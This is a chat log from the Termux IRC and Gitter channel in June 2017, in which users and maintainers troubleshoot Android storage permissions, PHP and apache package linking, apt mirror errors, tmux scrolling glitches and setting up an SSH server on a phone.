2017-06-12 13:22:55 escogido_ by termux-key-events I mean a new command I would implement to receive the events from the Java side of things.
2017-06-12 13:24:08 escogido_ if I had root I would just open /dev/input
2017-06-12 13:38:46 gitter1 (noncom) I have a EACCESS permission error when trying to save something from Termux to the /sdcard/Download folder
2017-06-12 13:38:51 gitter1 (noncom) does anyone know how to remedy that?
2017-06-12 13:47:10 escogido_ Isn’t there a ~/storage/shared folder for that?
2017-06-12 13:55:51 gitter1 (noncom) probably there is, but I am trying to compile the buildAPKs project as stated in the official instruction here: https://sdrausty.github.io/buildAPKs/reallyEasilyBuildAndroidAPKsOnDevice
2017-06-12 13:56:05 gitter1 (noncom) and it fails on that particular stage
2017-06-12 13:56:27 gitter1 (noncom) and I think it implies that the folder should be accessible
2017-06-12 13:56:57 gitter1 (noncom) and actually the Download folder is the one that is accessible from other programs since saving there usually brings up no issues
2017-06-12 14:25:14 rods-tab3 did you read https://termux.com/storage.html
2017-06-12 14:26:14 rods-tab3 that url should be in /topic since most often ? here
2017-06-12 14:29:22 gitter1 (noncom) @rods-tab3 yeah, I’ve read it and did as it said, I’ve run the latest version of termux-setup-storage
2017-06-12 14:31:14 phil42 i am liking the EasilyBuildAndroidAPKsOnDevice real good
2017-06-12 14:43:14 gitter1 (noncom) phil42 truly so
2017-06-12 14:54:19 phil42 it could be termux’s killer app
2017-06-12 16:25:00 gitter1 (noncom) the ultimate mission
2017-06-12 18:13:44 u0_a931 phil42: It is great to hear you like https://sdrausty.github.io/buildAPKs/reallyEasilyBuildAndroidAPKsonDevice
2017-06-12 18:17:14 phil42 i was surprised when it worked
2017-06-12 22:30:18 gitter1 (vishalbiswas) live_the_dream: I updated the x11 branch. I had to add libmesa to get glx working
2017-06-13 04:14:42 frumpylava @vishalbiswas is there any update on mariadb for arm?
2017-06-13 04:21:57 gitter1 (vishalbiswas) frumpylava: we still aren’t using unified headers, more exciting news arrives after we make the switch
2017-06-13 04:48:24 frumpylava @vishalbiswas, that sucks. :/
2017-06-13 06:51:53 live_the_dream_s @vishabiswas running good ole fluxbox
2017-06-13 07:09:34 live_the_dream_s messing about with tcltk demo stuff hehe
2017-06-13 07:20:49 gitter1 (vishalbiswas) live_the_dream_s: fluxbox is probably better for termux
2017-06-13 07:59:48 BrainDamage what are you using to forward the video to android? vnc?
2017-06-13 08:01:04 gitter1 (vishalbiswas) BrainDamage: yes, tigervnc on termux to render, then another app (bVnc) to interact
2017-06-13 08:16:29 frumpylava @vishalbiswas I rebuilt my php with mysqli support after merging your changes about php-apache. Now I get PHP Warning: PHP Startup: Unable to load dynamic library ‘/data/data/com.termux/files/usr/lib/php/pdo_pgsql.so’ - dlopen failed: library “libaprutil-1.so.0” not found in Unknown on line 0
2017-06-13 08:17:23 gitter1 (vishalbiswas) frumpylava: shit. can you use php without it?
2017-06-13 08:18:02 frumpylava @vishalbiswas yes. I just can’t load any extensions
2017-06-13 08:18:38 gitter1 (vishalbiswas) frumpylava: looks like pdo_pgsql wants to take this opportunity to link itself against apr-util, will need to add -lapr-util-1 to pgsql
2017-06-13 08:19:05 frumpylava @vishalbiswas I also can’t install apr because it says “dpkg: error processing archive /data/data/com.termux/files/usr/var/cache/apt/archives/apache2_2.4.25_aarch64.deb (–unpack):
2017-06-13 08:19:07 frumpylava trying to overwrite ‘/data/data/com.termux/files/usr/etc/apache2/httpd.conf’, which is also in package php 7.1.6
2017-06-13 08:20:00 gitter1 (vishalbiswas) frumpylava: apr != apache
2017-06-13 08:21:02 frumpylava ah, yeah sorry. apache.
2017-06-13 08:22:30 frumpylava @vishalbiswas, I get the linker error for all extensions, by the way, not just pgsql.
2017-06-13 08:24:44 gitter1 (vishalbiswas) frumpylava: a quick fix would be to add LDFLAGS="$LDFLAGS -lapr-1 -laprutil-1"
in preconfigure
2017-06-13 08:25:15 gitter1 (vishalbiswas) anyways this is real weird, it didn’t happen to me on arm, though
2017-06-13 08:25:35 gitter1 (vishalbiswas) can you build only php-apache, without php-mysql and see whether it still happens
2017-06-13 08:25:49 gitter1 (vishalbiswas) maybe its a 7.1.6 issue
2017-06-13 08:31:05 gitter1 (vishalbiswas) frumpylava: anstrace -y -f -s 5012
of the command would help some
2017-06-13 08:33:46 frumpylava @vishalbiswas https://glow.li/share/strace.out
2017-06-13 08:34:50 gitter1 (vishalbiswas) frumpylava: looks like I didn’t get the issue because I had aprutil installed
2017-06-13 08:36:10 frumpylava @vishalbiswas can confirm, installing apr-util fixes the problem.
2017-06-13 08:37:13 frumpylava So, there is no need for the LDFLAGS. apr-util just needs to be listed a dependency of php
2017-06-13 08:39:05 gitter1 (vishalbiswas) or php needs to be exorcised of aprutil
2017-06-13 08:39:19 gitter1 (vishalbiswas) sorry, too much horror novels
2017-06-13 08:48:27 frumpylava So, stop php from packaging etc/apache2 and also depend of apr-util (or don’t link against it)
2017-06-13 08:54:56 gitter1 (vishalbiswas) frumpylava: that config issue is entirely new
2017-06-13 08:56:37 frumpylava Well, it shouldn’t have come from my mysql packaging…
2017-06-13 08:58:47 frumpylava @vishalbiswas you were the one who introduced apache to all of this. ;)
2017-06-13 09:00:21 gitter1 (vishalbiswas) i’ll fix it tonight
2017-06-13 09:02:13 solid_boy Hi..
2017-06-13 09:02:15 frumpylava @vishalbiswas, no hurry, (at least not for my sake, I don’t actually use apache, so I don’t really care) it looks like it hasn’t been deployed yet (possibly because you didn’t bump the version of php)
2017-06-13 09:02:45 frumpylava solid_boy: Hi!
2017-06-13 09:02:59 solid_boy Need help
2017-06-13 09:04:41 solid_boy Not work apt update
2017-06-13 09:06:23 solid_boy Reading package lists… Done
2017-06-13 09:06:25 solid_boy E: Failed to fetch http://termux .net/dists/stable/main/binary-arm/Packages.xz Hash Sum mismatch
2017-06-13 09:06:25 solid_boy E: Some index files failed to download. They have been ignored, or old ones used instead.
2017-06-13 09:08:46 frumpylava solid_boy that seems to happen occasionally. Something about cloudflare. Try again later.
2017-06-13 09:09:01 frumpylava @fornwall You need to do something to cloudflare to make it work again, right?
2017-06-13 09:16:26 solid_boy apt clean && apt update
2017-06-13 09:16:44 solid_boy Not working
2017-06-13 09:17:17 gitter1 (vishalbiswas) solid_boy: it won’t. server side problem.
2017-06-13 09:17:30 solid_boy Oh…
2017-06-13 09:17:43 solid_boy Ok
2017-06-13 09:18:39 gitter1 (vishalbiswas) solid_boy: if you are feeling lucky, you can manually download and install deb files from http://termux.net/dists/stable/main/
2017-06-13 10:22:58 fornwall solid_boy & frumpylava: I purged the cloudflare cache, does it work now?
2017-06-13 13:49:00 frumpylava @vishalbiswas Finally have time to test dovecot, but I get CANNOT LINK EXECUTABLE “dovecot”: library “libdovecot.so” not found
2017-06-13 15:06:45 gitter1 (francmarx) hello, anybody here?
2017-06-13 17:32:42 gitter1 (fornwall) @vishalbiswas about php linking to libapr and libapr-util a bit too much, is that caused by the first part of https://github.com/termux/termux-packages/blob/master/packages/php/sapi-apache2handler-config.m4.patch ?
2017-06-13 17:34:00 gitter1 (fornwall) I guess libexec/apache2/libphp7.so needs to link with libapr due to https://github.com/android-ndk/ndk/issues/201, but it seems to affect too much at the moment?
2017-06-13 18:45:33 gitter1 (fornwall) @francmarx hello :)!
2017-06-13 19:03:07 rods-tab3 termux updated new version
2017-06-13 20:10:33 sielicki I’ve been using termux on a chromebook, it’s a pretty good experience. The terminal lags behind if you have a lot of output, some kind of better buffering is needed. But other than that, it’s really a great alternative to crouton if you don’t need any x11.
2017-06-13 20:11:22 sielicki One issue I’ve noticed is that chromeos will eat a lot of key combinations. For example, C-n will open a new chrome window rather than pushing that through to termux.
2017-06-13 20:11:56 sielicki I was looking through the documentation for android on chromeos, I couldn’t find anything specific that talked about this. I think it’s just a few lines that need to be added to the manifest.
2017-06-13 20:13:23 sielicki Outside of that, better mouse support for termux would be nice– not because I’m expecting to using the mouse on the terminal (like scrollwheel to scroll in vim, etc.) but rather, clicking anywhere opens the same menu that is opened on a phone when you tap.
2017-06-13 20:13:49 sielicki It would be better if, when a mouse clicks, it selects text like on any desktop terminal emulator.
2017-06-13 22:46:30 AmR | EiSa Hello |
2017-06-13 22:47:22 gitter1 (vishalbiswas) AmR | EiSa: hi |
2017-06-13 23:07:36 gitter1 (vishalbiswas) frumpylava: I have created https://github.com/termux/termux-packages/pull/1084 to fix the issues related to php-apache. please check and tell whether they are resolved
2017-06-13 23:20:47 gitter1 (vishalbiswas) about dovecot, I’ll upload another build shortly
2017-06-13 23:26:17 gitter1 (mklein994) @its-pointless I’ve been ~learning~ trying to learn rust. Thanks for the package, and for including rust docs! It makes it easier to learn when I don’t have WiFi.
2017-06-13 23:33:50 AmR | EiSa I need to work with Qt in mobile can I do that with termux ? |
2017-06-13 23:34:55 gitter1 (vishalbiswas) AmR | EiSa: not yet. It has been requested a couple of times though. can you create a package request at https://github.com/termux/termux-packages/issues? |
2017-06-13 23:35:36 gitter1 (vishalbiswas) currently, its customizations for android prevent it from adding even the cli packages
2017-06-13 23:47:07 AmR | EiSa Core part from Qt is cli too, like wxbase. |
2017-06-13 23:47:28 AmR | EiSa gitter1: ^ |
2017-06-14 01:02:56 AmR | EiSa Did termux have gui text editor? |
2017-06-14 01:11:16 gitter1 (vishalbiswas) no
2017-06-14 01:11:25 gitter1 (vishalbiswas) nothing gui
2017-06-14 01:35:02 AmR | EiSa Can I use clange from other editor ? |
2017-06-14 06:10:38 frumpylava Is there any way I can disable sshd and other services from binding to my rmnet_data0 (mobile data) and only respond to wlan0?
2017-06-14 07:39:51 quite Yow! termux:widget very cool. Is there a way to not have the termux session staying around after script is done? I do like to see the output from my rsync backup, and pressing enter is fine, just the session residue is annoying..
2017-06-14 08:15:47 BrainDamage frumpylava: you can bind using listenaddress, but afaik you can only specify address ranges rather than interfaces, which kind of suck
2017-06-14 08:19:13 gitter1 (vishalbiswas) or you can use wrappers instead of the real binaries which will just look up your address on a particular interface and execute the underlying daemon with it
2017-06-14 08:19:21 frumpylava BrainDamage: So I would have to set that to whatever my current IP in the WiFi?
2017-06-14 08:19:57 BrainDamage you can put there address ranges
2017-06-14 08:21:49 BrainDamage as a kludge you could listen to typical link local addresses such as 192.168/16 and 10./8 and 169.254/16 and that should cover essentially all the lans
2017-06-14 08:22:59 BrainDamage I really dislike how most software doesn’t let you bind by interface, the most common use case is roaming ip,not static
2017-06-14 08:26:57 frumpylava BrainDamage: Thanks.
2017-06-14 08:28:45 BrainDamage oh and don’t forget to add localhost
2017-06-14 13:29:34 kr1shna there is no termux folder on my sdcard, is this normal ?
2017-06-14 13:31:56 kr1shna i mean /storage/emulated/0
2017-06-14 13:38:44 quite kr1shna: Yeah. I found that you have to go info settings,apps,termux,permission and give it Storage permission, then it’ll appear
2017-06-14 13:38:48 quite to go into
2017-06-14 13:42:12 kr1shna quite: i dont have option for storage permission, i am on android 5.1
2017-06-14 13:43:06 kr1shna otherwise should i run termux-setup-storage
2017-06-14 13:43:29 kr1shna as given in help files
2017-06-14 14:09:23 krttrn I don’t see my sd card in the shared folder
2017-06-14 18:40:23 gitter1 (fornwall) @vishalbiswas I still got problems with libapr and libapr-util being linked to too much even after https://github.com/termux/termux-packages/pull/1084. I made a new attempt at https://github.com/termux/termux-packages/commit/af997cb536c9e599411a887a6a02b010e2db1119
2017-06-14 18:41:52 gitter1 (fornwall) the built php-apache
package from that change has just been pushed to the package repo - does it work for you?
2017-06-14 20:15:14 sdrausty Just published from Termux https://plus.google.com/communities/101692629528551299417
2017-06-14 20:16:35 sdrausty Days at the South Pole https://m.youtube.com/watch?list=PLJ6pP26JOyIN7tho_Y3IUADTt6mTZ94Ag&v=Bj_eZ5dlBkI from Termuxed
2017-06-14 22:10:02 gitter1 (chadmpaul) hello! termux noob here probably to ask the same question again. looks like I have storage as setup as all guides show. I can create text files without issue. trying to do npm and it bombs out with a permission error. Unhandled rejection Error: EACCES: permission denied, link ‘/data/data/com.termux/files/home/.npm/_cacache/tmp/2be2e530’ ->
2017-06-14 22:10:02 gitter1 ‘/data/data/com.termux/files/home/.npm/_cacache/content-v2/sha512/93/80/cc6bcea9a27632a03418e60117e05fed8ada3363bc4a2ff87c188e682ce02d433f68fc00a33d73206e4d0161f34b4aba4a168ba53f596f52e84ec1e862e3’
2017-06-14 22:41:54 gitter1 (vishalbiswas) @fornwall Its working
2017-06-15 01:24:42 gitter1 (fornwall) @vishalbiswas great!
2017-06-15 03:00:17 frumpylava We should have our own logo for screenfetch and neofetch ;)
2017-06-15 03:14:05 live_the_dreams a picture of a terminal
2017-06-15 03:14:13 live_the_dreams in a terminual?
2017-06-15 03:15:15 frumpylava I think the termux icon is a good app icon, but maybe we a dedicated logo?
2017-06-15 03:15:19 frumpylava live_the_dreams: Can you draw?
2017-06-15 03:15:25 live_the_dreams no
2017-06-15 10:01:37 bob____ hi
2017-06-15 10:03:46 bob____ is it possible to change the theme of termux via the command line? i see the settings are stored in ~/.termux/colors.properties but how do i reload it if i edit it?
2017-06-15 10:08:06 BrainDamage you can change the terminal palette on the fly with escape codes
2017-06-15 10:08:26 BrainDamage bonus points it works for other TE too when you connect trough ssh
2017-06-15 10:08:36 BrainDamage eg using https://github.com/mkoskar/tcolors
2017-06-15 10:12:50 bob____ thanks BrainD
2017-06-15 10:13:11 bob____ is it temporary or does tcolors update them for the next sessions as well?
2017-06-15 10:14:59 BrainDamage temporary, but you can eg call it from your shell’s rc file
2017-06-15 10:15:15 bob____ yes ok thanks :)
2017-06-15 10:15:34 bob____ i see it’s not available via pip in termux
2017-06-15 10:15:47 bob____ you cloned the git?
2017-06-15 10:15:58 BrainDamage it’s literally 1 file you need
2017-06-15 10:16:30 BrainDamage wget https://raw.githubusercontent.com/mkoskar/tcolors/master/bin/tcolors.py; chmod +x tcolors.py
2017-06-15 10:16:31 BrainDamage done
2017-06-15 10:17:05 bob____ awesome :)
2017-06-15 10:17:09 bob____ do you use it as well?
2017-06-15 10:17:15 BrainDamage yes
2017-06-15 10:17:37 bob____ termux is amazing
2017-06-15 10:17:56 BrainDamage I roam terminals and it lets me keep a consistent look across them without having to muck with the config
2017-06-15 10:18:30 BrainDamage I only wish there was one ansi escape code for font selection too
2017-06-15 10:18:52 bob____ i was thinking about that tcolors to switch between light and dark schemes
2017-06-15 10:19:29 BrainDamage you can do that fine, just write 2 x resources files then load the appropriate one
2017-06-15 10:19:41 bob____ what are your fav colorscheme you use in termux?
2017-06-15 10:19:52 BrainDamage my own
2017-06-15 10:23:48 bob____ thanks for everything
2017-06-15 13:25:23 guest_____ 888
2017-06-15 16:03:33 gellmar Hi! Is the author of tsu available here? There are pull requests,pending + I’d like to add one more but the development seems abandoned
2017-06-15 20:41:21 u0_a453 quit
2017-06-16 15:24:48 MaxplayBR Ola
2017-06-16 15:24:52 MaxplayBR Hello
2017-06-16 15:25:43 kspencer Is there a chance of ‘ddate’ being ported to termux?
2017-06-16 15:26:30 MaxplayBR I Speak From Brasil
2017-06-16 16:14:21 Redoubtable Hi, I’m having trouble setting up the ssh server; I actually have it running, but not in the securest mode; van anyone provide step by step procedure for setup? Thanks
2017-06-16 16:40:51 Redoubtable Hello, I’m new to the Termux IRC community, but I’m pleased to be here. I left a message about setting up the Termux ssh server; as I am very new to this technology, I require the knowledge and expertise of superusers. To reiterate, would it be possible to for provision of a procedure for the implementation of the server?
2017-06-16 19:48:01 AmR | EiSa Hello |
2017-06-16 19:48:02 AmR | EiSa Can I use clange from other editor ? |
2017-06-16 23:32:26 gitter1 (mklein994) Redoubtable: lots of big words, but not enough substance . What are you really trying to do? What steps have you tried?
2017-06-16 23:33:46 gitter1 (mklein994) kspencer: I managed to compile dateutils on arm
. What architecture do you have?
2017-06-16 23:34:48 kspencer arm?
2017-06-16 23:36:11 kspencer Yeah its arm
2017-06-16 23:37:17 gitter1 (mklein994) bob____: simply run termux-reload-settings
. (You may need termux-tools
installed, both the Play Store app and from apt
.)
2017-06-16 23:49:06 gitter1 (mklein994) I was just looking, and I realized I must have lost it after reformatting my phone. I remember it wasn’t too hard to find the compiler options for it though.
2017-06-17 00:47:01 u0a3 Quit
2017-06-17 11:58:06 gitter1 (gscacco) Hi, I’ve installed Termux on xiaomi redmi note 2. When I run some (not all !) termux api command can’t get any result. The command is blocked waiting for something and I have to kill them with Ctrl-c. Can you hep me ? Thanks
2017-06-17 12:52:38 gitter1 (gscacco) And some commands are extremely slow. For example:
2017-06-17 12:52:42 gitter1 (gscacco) ```
2017-06-17 12:52:55 gitter1 (gscacco) time termux-info
2017-06-17 12:53:11 gitter1 (gscacco) real 0m30.184s
2017-06-17 14:51:24 rods-tab3 yes about right for the time
2017-06-17 16:23:08 paradigm Occasionally, after some hours or days, I find termux died. Presumably Android killed it. I found that keeping a terminal open so the slide-down from the top shows a bar for Termux seems to help but is not sufficient to keep Android from ever killing termux. In contrast, I’ve never seen Tasker disappear on me. Is there something I could do to keep Termux alive like Tasker appears to be? I’ve got some
2017-06-17 16:23:14 paradigm cron jobs that I’ve found I can’t rely on if Termux dies overnight or while my phone is in my pocket.
2017-06-17 16:40:03 rods-tab3 its an android feature - throws stuff into standby/sleep mode
2017-06-17 16:48:48 rods-tab3 try: termux-wake-lock –help
2017-06-17 17:24:19 paradigm the-solipsist: thanks!
2017-06-17 17:24:22 paradigm err
2017-06-17 17:24:26 paradigm rods-tab3: thanks!
2017-06-17 17:24:37 paradigm nick tab completion is difficult -.-
2017-06-17 17:26:03 rods-tab3 computers is hard
2017-06-17 17:26:10 paradigm agreed
2017-06-17 20:03:32 kspencer I don’t have the username, but the person that answered me yesterday with ‘dateutils’, d-date - the - discordian date, under util-linux or so
2017-06-17 20:03:54 kspencer usually you have to build it with –enable-ddate
2017-06-17 20:04:28 kspencer or its supposedly in the regular repos as ddate as well
2017-06-18 00:21:17 gitter1 (vishalbiswas) @fornwall do you have any scriptlets to handle building or validate built packages?
2017-06-18 14:56:09 gitter1 (fornwall) @vishalbiswas yes, I have one that checks some things in built packages
2017-06-18 14:56:14 gitter1 (fornwall) - a file shouldn’t exist in multiple packages (unless the packages conflict with eachother)
2017-06-18 14:56:14 gitter1 (fornwall) - man pages should be under $PREFIX/share/man
2017-06-18 14:56:14 gitter1 (fornwall) - that shared libraries that are linked in are found in the dependencies of the package
2017-06-18 14:56:14 gitter1 (fornwall) - that some aspects of elf files are correct
2017-06-18 14:56:56 gitter1 (fornwall) I’ll look at publishing it, as especially the scan of all elf files to find all linked shared libraries are useful
2017-06-18 15:04:16 gitter1 (fornwall) I’ve just pushed the start of the transition to unified headers
2017-06-18 15:04:44 cottongin new chromebook android update seems to have broken scrolling/touch in termux
2017-06-18 15:07:14 gitter1 (fornwall) using unified headers is only for preview experimentation at the moment, export TERMUX_UNIFIED_HEADERS=1
before building to use it
2017-06-18 15:08:31 gitter1 (fornwall) this sets up a standalone toolchain with the new unified headers (https://android.googlesource.com/platform/ndk/+/master/docs/UnifiedHeaders.md) and patches it using the new ndk_patches_unified/
folder (instead of the current ndk_patches/
folder used for the non-unified headers)
2017-06-18 15:10:47 fornwall cottongin: thanks for reporting, I
2017-06-18 15:11:01 fornwall should really get a chromebook to test things out
2017-06-18 15:11:16 cottongin it might just be tmux it seems to work fine out of tmux
2017-06-18 15:13:20 cottongin but there’s definitely some odd behavior going on
2017-06-18 15:20:29 fornwall cottongin: hm, just to be sure, can you verify that you are running latest tmux (-V should show 2.5), and try with a clean config (temporary move away ~/.tmux.conf)?
2017-06-18 15:21:51 cottongin fornwall: to be clear, sorry, meant tmux on my remote box i’m ssh’d into from termux
2017-06-18 15:22:15 cottongin well, mosh’d
2017-06-18 15:22:32 cottongin i wonder if mosh is being weird
2017-06-18 15:22:52 cottongin when i scroll sometimes it is sending garbage, maybe key codes, to the terminal
2017-06-18 15:22:59 cottongin 0;74;-10m32;71;-19M32;71;-20M32;71;-20M32;71;-20M0;71;-20m
2017-06-18 15:23:00 cottongin like that
2017-06-18 15:24:04 cottongin well it’s not mosh
2017-06-18 15:24:29 gitter1 (fornwall) do you have mouse enabled in tmux on the remove box?
2017-06-18 15:25:05 cottongin i do
2017-06-18 15:25:37 cottongin it worked yesterday, and today there was an android upgrade for my chromebook (asus c302ca)
2017-06-18 15:25:44 cottongin and now it doesn’t work
2017-06-18 15:25:52 cottongin so i assumed it was related to the update
2017-06-18 15:27:03 cottongin i should upgrade tmux though, i’m on 2.1 on the remote box
2017-06-18 15:44:24 cottongin upgraded to 2.5
2017-06-18 15:44:30 cottongin no change
2017-06-18 19:14:53 live_the_dreams ooooo unified
2017-06-18 19:21:16 live_the_dreams anyway cottongin sometines that happens to me and i have to restart the shell tmux. not all of windowz in tmux just that one
2017-06-19 05:44:56 IRC-Source_79321 Hey
2017-06-19 05:52:30 xunl355x Hey
2017-06-19 05:52:48 xunl355x I want asking something
2017-06-19 06:30:53 paradigm xunl355x: go ahead and ask
2017-06-19 06:57:37 m4sk1n fornwall: ping
2017-06-19 07:27:32 m4sk1n does termux support l10n?
2017-06-19 08:40:52 gitter (mklein994) kspencer: oh… ddate
. I got that confused with ddiff
. In that case, I can’t help you there, sorry.
2017-06-19 11:20:11 frumpylava Is running a process in a proot jail actually slower than running natively? My tests are inconclusive.
2017-06-19 12:18:32 gitter (vishalbiswas) frumpylava: filesystem intensive programs will be much more slower than others
2017-06-19 14:24:13 paradigm frumpylava: while I’ve not done any serious investigation into it, from what I understand ptrace (and thus, proot) adds overhead only on system calls. General execution should be uneffected, but if you’re doing some system call in a tight loop (which should normally be avoided for performance reasons anyways), I’d expect a proot contained progress to be slower.
2017-06-19 14:35:39 paradigm frumpylava: https://gist.github.com/paradigm/75b5195c68b146c2252836499e9d22c5
2017-06-19 14:36:20 paradigm seems pretty definitive that there is a decent chunk of system call overhead
2017-06-19 15:14:33 frumpylava paradigm, @vishalbiswas: yeah, that seems considerable. I am running my mariadb and my nginx in a proot jail (each) and I was wondering if there was some kind of performance hit.
2017-06-19 15:17:14 doomsday101 hello
2017-06-19 15:20:11 kspencer @mklein994 seems ‘gem install rubysl-parsedate ddate’ does well enough, though I’ll have to do some configuring of my own
2017-06-19 16:27:24 fornwall m4sk1n: no, no translation of the (few strings) in the app itself, and packages are also generally built without support for multiple languages
2017-06-19 16:28:10 m4sk1n ok
2017-06-19 16:29:31 m4sk1n also, what about making use of Broadcast Tile from QuickSettings in Termux:Float instead of statusbar entry?
2017-06-19 22:07:28 enedil Hi
2017-06-19 22:07:36 enedil can I change the font size in termux?
2017-06-19 22:09:35 rods-tab3 squeeze two fingers - draw apart to increase, together to decrease font size
2017-06-19 22:11:21 u0_a94 rod-yolo: I’m enedil from termux from weechat, yay!
2017-06-19 22:11:37 u0_a94 that’s just excellent
2017-06-19 22:12:16 u0_a94 some time before, I even paid for an app that gave me c++ compiler on android
2017-06-19 22:16:17 rods-tab3 iirc termux has clang; not sure if its c++
2017-06-19 22:17:27 u0_a94 yes it has
2017-06-19 22:17:38 u0_a94 albeit available in repos
2017-06-19 22:18:13 u0_a94 in fact I revived my old android tablet just to learn ARM assembly
2017-06-20 11:05:11 exarch I seem to see a problem with the newest neovim package. is this the right place to discuss this?
2017-06-20 11:18:27 enedil exarch: I believe so
2017-06-20 11:18:33 enedil what’s the problem?
2017-06-20 11:19:37 exarch well, i tried to use the remote netrw on the latest neovim and it spits out tons of errors. It’s rather hard for me to diagnose
2017-06-20 11:19:55 exarch the command I used is of the form:
2017-06-20 11:20:08 exarch :e scp://host//path/file.txt
2017-06-20 11:49:48 gitter (noncom) is there a way to stop Termux from vibrating when I am erasing from a command line and there’s nothing to erase?
2017-06-20 11:50:36 gitter (noncom) just when I Termux at night, among the sleeping ones, their ears get irritated and their mind awakens to the buzzing of Termux
2017-06-20 11:50:40 gitter (noncom) I want to prevent that
2017-06-20 11:50:58 gitter (noncom) that places my mission under a risk
2017-06-20 11:51:01 gitter (noncom) I want to prevent that
2017-06-20 11:52:45 rods-tab3 dont erase
2017-06-20 11:55:58 gitter (noncom) but I can’t…
2017-06-20 11:56:15 gitter (noncom) it just happens on that and some other occasions
2017-06-20 11:57:21 gitter (noncom) the vibration
2017-06-20 12:05:39 frumpylava @noncom https://termux.com/configuration.html See “Handling the Bell character”
2017-06-20 12:17:15 sdrausty https://youtu.be/ufIvYFpgsoE
2017-06-20 12:18:25 sdrausty About to be published from Termux;
2017-06-20 12:25:25 sdrausty Comments please…
2017-06-20 12:42:16 rods-tab3 bad url
2017-06-20 12:53:23 m4sk1n what about ipython package?
2017-06-20 13:02:46 Regenaxer Hi all! Since Android 7 I noticed that the LED in ‘termux-notification –id 7 … –led-color 00FF00’ does not work any longer
2017-06-20 13:02:49 Regenaxer Anybody observed similar problems?
2017-06-20 13:17:25 enedil m4sk1n: why do you want ipython?
2017-06-20 13:18:19 enedil m4sk1n: or maybe better question - why do you want ipython package?
2017-06-20 13:19:07 m4sk1n I want ipython package to use ipython :P
2017-06-20 13:20:34 enedil you ca
2017-06-20 13:20:37 enedil can*
2017-06-20 13:21:01 enedil wait, I’ll show you how
2017-06-20 13:25:13 enedil m4sk1n: https://postimg.org/image/os9m3b5qn
2017-06-20 13:39:07 enedil Why is there even cmus package if there’s no support for playing music from it?
2017-06-20 13:39:35 enedil or is there?
2017-06-20 18:06:26 sdrausty rods-tab3: Thank you.
2017-06-20 18:22:56 rods-tab3 for what ?? is there a working url ?
2017-06-20 18:51:45 rods-tab3 are you at South Pole ? https://mobile.twitter.com/SDRausty
2017-06-20 20:00:42 anonymEcho can i ask u something?
2017-06-20 20:01:00 anonymEcho hello?
2017-06-20 20:03:25 rods-tab3 bbl - din time
2017-06-20 20:22:31 u0_a152 can i ask u something?
2017-06-20 20:54:32 rods-tab3 yes,yes
2017-06-20 21:12:19 gitter (mklein994) Regenaxer: try locking your phone. Does it work then? It works for me (Galaxy S5, running LineageOS 7.1.2).
2017-06-20 22:06:40 gitter (TheCryptek) I ask because I’m trying to ssh into a server that uses key verification instead of password verification
2017-06-20 22:23:20 gitter (mklein994) I don’t
2017-06-21 00:46:59 Regenaxer gitter: Also in locked state the LED does not light
2017-06-21 00:55:15 Regenaxer It is a Nexus 9
2017-06-21 01:41:56 Maletil Hi there.
2017-06-21 02:26:48 frumpylava My phone seems to disable 2 of my 6 cores when the screen is off. Is there any way to enable them without turning the screen on? I am currently treating truning the screen on as a sort of “turbo mode”. It’s sort of annoying only having 4 cores available when connected via ssh.
2017-06-21 02:33:12 gitter (prinxy) Through my keyboard….. I disabled vibration from my keyboard
2017-06-21 02:34:11 gitter (prinxy) I use termux on my phone, all I did was to go to keypad setting and disabled it
2017-06-21 02:45:37 Regenaxer Since earliest times I get “Aborted” for calls like ‘fgrep -i foobar Mail/*’
2017-06-21 02:46:02 Regenaxer iirc fornwall once fixed it, but since quite some time I have it again
2017-06-21 02:48:21 Regenaxer Anybody else?
2017-06-21 02:50:54 Regenaxer Seems that any call to fgrep -i (also on a single short file) aborts
2017-06-21 02:52:39 Regenaxer Sometimes (usually after some longer time of runnig) Termux crashes when selecting text and “Copy”
2017-06-21 02:53:34 Regenaxer The garbage issue in tmux is also still life and well ;)
2017-06-21 02:54:26 Regenaxer (these are no complaints! Just bug reports :)
2017-06-21 03:01:21 Regenaxer Printing some “non-printing” characters in Termux completely hang thes session. I don’t know exactly which, can reproduce in PicoLisp with : (for I (range 33 255) (prin (char I)))
2017-06-21 05:20:59 fornwall Regenaxer: ok, I can reproduce the grep issue, https://github.com/termux/termux-packages/issues/1099, I’ll look into it later today!
2017-06-21 05:21:20 Regenaxer thanks fornwall!
2017-06-21 05:21:47 Regenaxer Strange that I’m the only one … nobody uses fgrep with -i ?
2017-06-21 05:28:15 fornwall about the crash when copying text after running for a while, could you start up termux and run ‘logcat’ afterwards, and see if you find a java stack trace there, and if so put it up somewhere?
2017-06-21 05:37:09 Regenaxer OK, yes
2017-06-21 07:52:17 gitter (de-facto) Mattew Klein: phones – what can I say? I want to set up the ssh server, as described in the docs, but I don’t know how to. I have hit on one method, butit does not seem secure, though it works. Placing Keys in /.ssh/authorized_keys is fine, but I have to put id_rsa in ~/ in order for achieve success. What is the solution? Sorry about the last word!
2017-06-21 09:30:15 gitter (TheCryptek) After running sshd I can’t connect to my ssh server from a PC can anyone help me out to make sure I’m not screwing up [command I used is sshd -p 8022]
2017-06-21 09:40:06 frumpylava @TheCryptek what error message do you get?
2017-06-21 09:41:21 gitter (TheCryptek) frumpylava: I get this └──╼ $ssh test@192.168.0.19 -p 8022
2017-06-21 09:41:21 gitter (TheCryptek) ssh: connect to host 192.168.0.19 port 8022: No route to host
2017-06-21 09:41:21 gitter (TheCryptek)
2017-06-21 09:42:12 frumpylava does it work on termux? Ie. ssh test@localhost -p 8022
2017-06-21 09:42:29 gitter (TheCryptek) frumpylava Yes
2017-06-21 09:43:28 gitter (TheCryptek) I mean I get permission denied because of my public key, but it connects
2017-06-21 09:43:59 frumpylava Are you sure that is your ip? Does ping work?
2017-06-21 09:44:19 gitter (TheCryptek) Ping doesn’t work but ifconfig claims my ip is 192.168.0.19
2017-06-21 09:44:47 gitter (TheCryptek) and even in my phone settings at about phone, it says my ip is 192.168.0.19
2017-06-21 09:44:51 gitter (TheCryptek) frumpylava
2017-06-21 09:46:48 frumpylava So it’s not actually sshd. You just can’t connect to your phone in general. Seems like a routing issue. Are you at home or in a corporate or school network?
2017-06-21 09:47:16 gitter (TheCryptek) I’m at home.
2017-06-21 09:47:36 gitter (TheCryptek) I can connect my phone to an ssh server on my laptop though.
2017-06-21 09:50:21 frumpylava Maybe wifi devices are isolated on your router.
2017-06-21 09:50:52 gitter (TheCryptek) frumpylava: Then why can my phone connect and use an ssh server running on my laptop which is connected via wifi?
2017-06-21 09:52:36 frumpylava hmm… that’s weird then.
